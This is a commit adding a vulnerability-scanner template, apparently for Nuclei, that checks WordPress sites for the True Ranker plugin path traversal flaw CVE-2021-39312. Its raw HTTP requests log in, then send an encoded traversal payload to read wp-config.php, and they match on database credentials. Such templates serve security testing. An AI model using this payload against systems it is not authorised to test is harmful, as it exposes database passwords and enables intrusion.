Create CVE-2021-39312.yaml

2022-05-01 16:08:22 +05:30 · 2022-05-01 16:08:22 +05:30 · 7ee380cb9e
parent ce8efa4f01
commit 7ee380cb9e
1 changed files with 47 additions and 0 deletions
--- a/cves/2021/CVE-2021-39312.yaml
+++ b/cves/2021/CVE-2021-39312.yaml
@ -0,0 +1,47 @@
+id: CVE-2021-39312
+
+info:
+  name: True Ranker < 2.2.4 - Authenticated Arbitrary File Access via Path Traversal
+  author: DhiyaneshDK
+  severity: high
+  description: The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file.
+  remediation: Fixed in version 2.2.4
+  reference:
+    - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-39312
+  tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200